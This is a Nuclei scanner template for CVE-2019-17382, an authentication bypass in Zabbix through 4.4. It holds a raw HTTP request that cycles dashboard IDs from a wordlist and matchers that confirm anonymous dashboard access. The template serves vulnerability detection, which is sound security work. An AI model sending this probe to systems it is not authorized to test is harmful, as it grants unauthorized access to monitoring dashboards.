nuclei-templates/cves/2019/CVE-2019-17382.yaml

34 lines
1.1 KiB
YAML

id: CVE-2019-17382
info:
name: Zabbix Authentication Bypass
author: harshbothra_
severity: critical
description: An issue was discovered in zabbix.php?action=dashboard.view&dashboardid=1 in Zabbix through 4.4. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin.
reference: https://www.exploit-db.com/exploits/47467
tags: cve,cve2019,zabbix,fuzz
requests:
- payloads:
ids: helpers/wordlists/numbers.txt
attack: sniper
threads: 50
raw:
- |
GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0
Accept-Language: en-US,en;q=0.9
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<title>Dashboard</title>"